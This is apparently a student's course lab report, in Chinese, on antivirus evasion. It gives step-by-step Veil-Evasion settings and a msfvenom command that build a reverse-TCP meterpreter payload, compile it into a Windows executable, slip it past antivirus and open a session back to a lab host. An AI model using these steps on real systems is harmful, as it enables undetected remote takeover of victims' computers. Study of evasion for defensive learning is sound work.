20145324 王嘉澜《网络对抗技术》 免杀原理与实践

实验内容

•使用msf编码器，veil-evasion，以及利用shellcode编程等免杀工具，来验证各种免杀方式的免杀强度

•通过组合各种技术实现恶意代码免杀，在另一台有杀毒软件的主机上进行测试

实践步骤

•通过VirSCAN.org来检测上次实验生成的病毒的抗杀能力

•检测结果



•该病毒被检测出来，并被发现是木马病毒

•吓得我赶紧删了，谁知道检查的时候又让传一遍

•使用Veil-Evasion生成可执行文件

•在终端输入指令veil-evasion打开软件



•设置payload：use python/meterpreter/rev_tcp

•设置反弹连接IP：set LHOST 192.168.88.129

•设置反弹端口4444：set port 4444

•生成：generate

•程序名：5324

•选择操作：1

•程序生成成功，在目录下找到该程序，发送到win检测



•检测结果

•C语言调用Shellcode

•在kali下，执行指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.129 LPORT=5324 -f c 生成一个C语言shellcode数组



•用命令行创建一个C文件：MSSC.c，将上面生成的数组复制到该文件下，并加入一个主函数

•使用命令i686-w64-mingw32-g++ MSSC.c -o MSSC_5324.exe 将该C语言代码MSSC.c转换为一个可在64位win下操作的可执行文件MSSC_5324.exe



•将MSSC_5353.exe传到win，电脑管家马上报告说有危险，添加到信任区，检测

•检测结果



•很少一部分软件可以查出来

•使用ncat把exe传到电脑







•使用电脑管家杀毒，结果发现不了



•在Kali下使用msf监听，运行刚刚编译生成的可执行文件，获取权限





•回连成功

基础问题回答

1、杀软是如何检测出恶意代码的？

•通过特征码：与已经存在的恶意代码进行比对之类的

•通过行为：恶意代码可能会修改注册表、设置自启动、更改系统日志等

2、免杀是做什么？

•通过恶意代码植入技术使得恶意代码不会被杀毒软件检测出来

3、免杀的基本方法有哪些？

•加壳、使用反弹式连接

•用其他的语言编译等

实验总结与体会

触目惊心，平时信赖的杀毒软件也检测不出来自己写的恶意代码，想到以前自己为了电脑安全还一口气装了好几个杀毒软件，too naive

离实战还缺的技术或步骤

杀毒软件的病毒库是不断更新的，真正要实战的话应该还需要投入更多的时间和精力来研究代码漏洞